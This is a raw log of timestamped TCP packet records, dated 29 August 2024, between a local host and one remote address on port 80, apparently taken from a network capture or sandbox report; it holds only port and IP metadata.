                                    Aug 29, 2024 12:02:36.470287085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470299959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470314026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470328093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470344067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470371962 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470371962 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470392942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470405102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470477104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470496893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470509052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470520020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470535040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470551014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470556021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470565081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470577955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470582008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470593929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470593929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470654011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470654011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470786095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470799923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470810890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470824957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470838070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470843077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470849991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470880985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470894098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651899099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651983976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651994944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652007103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652014971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652018070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652029991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652034044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652043104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652050972 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652055025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652079105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652095079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652168036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652179956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652192116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652201891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652204037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652224064 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652252913 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652285099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652297974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652307987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652318954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652323961 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652335882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652362108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652412891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652425051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652436018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652445078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652472973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652475119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652496099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652507067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652507067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652518988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652530909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652534008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652544022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652560949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652576923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652698994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652712107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652721882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652733088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652735949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652745008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652751923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652779102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652968884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652981997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652993917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653004885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653006077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653017998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653029919 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653032064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653043985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653055906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653060913 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653067112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653079987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653084040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653091908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653100967 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653103113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653115988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653120041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653127909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653136015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653163910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653331995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653343916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653367043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653392076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653498888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653512001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653522015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653532982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653534889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653547049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653549910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653558969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653567076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653569937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653589010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653595924 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653599977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653611898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653614044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653625011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653636932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653637886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653650045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653661013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653666973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653671980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653681993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653688908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653708935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653733969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653923988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653944969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653956890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653971910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653975010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653987885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653990030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654000044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654012918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654017925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654026031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654035091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654037952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654050112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654059887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654062033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654073954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654087067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654088020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654104948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654122114 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654340029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654352903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654365063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654377937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654383898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654390097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654396057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654402971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654413939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654433966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654448986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689201117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689222097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689234972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689259052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689286947 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689291000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689302921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689315081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689328909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689342022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689362049 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742005110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742078066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742090940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742110968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742121935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742132902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742139101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742155075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742192984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742218971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742233038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742244959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742254019 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742254972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742269993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742288113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742315054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742325068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742336035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742346048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742357969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742358923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742373943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742377043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742403984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742407084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742460966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742472887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742487907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742501020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742510080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742523909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742541075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742583036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742597103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742609024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742620945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742620945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742634058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742640972 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742672920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742727041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742737055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742748022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742758989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742760897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742779970 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742805004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742918015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742930889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742943048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742954969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742955923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742966890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742973089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742980003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742993116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743001938 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743016958 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743041992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743053913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743087053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743196011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743210077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743223906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743238926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743241072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743252993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743257046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743263960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743266106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743278980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743283033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743294954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743307114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743309975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743319988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743330002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743356943 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743393898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743405104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743417025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743427992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743455887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743510008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743520021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743531942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743545055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743555069 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743587971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743644953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743663073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743674994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743680000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743686914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743700027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743710041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743710995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743722916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743736029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743740082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743747950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743757010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743772984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743798971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743937969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743951082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743963003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743974924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743987083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743998051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744012117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744024038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744025946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.744034052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744055986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.744075060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.744210958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744224072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744235039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925041914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925052881 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925064087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925076008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925076008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925103903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925183058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925194025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925204039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925215006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925215960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925225973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925244093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925268888 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925293922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925304890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925316095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925326109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925329924 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925347090 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925371885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925457001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925467968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925479889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925492048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925493956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925503969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925514936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925515890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925529003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925539970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925549030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925565004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925590992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925669909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925681114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925693035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925703049 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925704956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925717115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925723076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.925731897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.925755978 CEST4971780192.168.2.6172.67.128.117
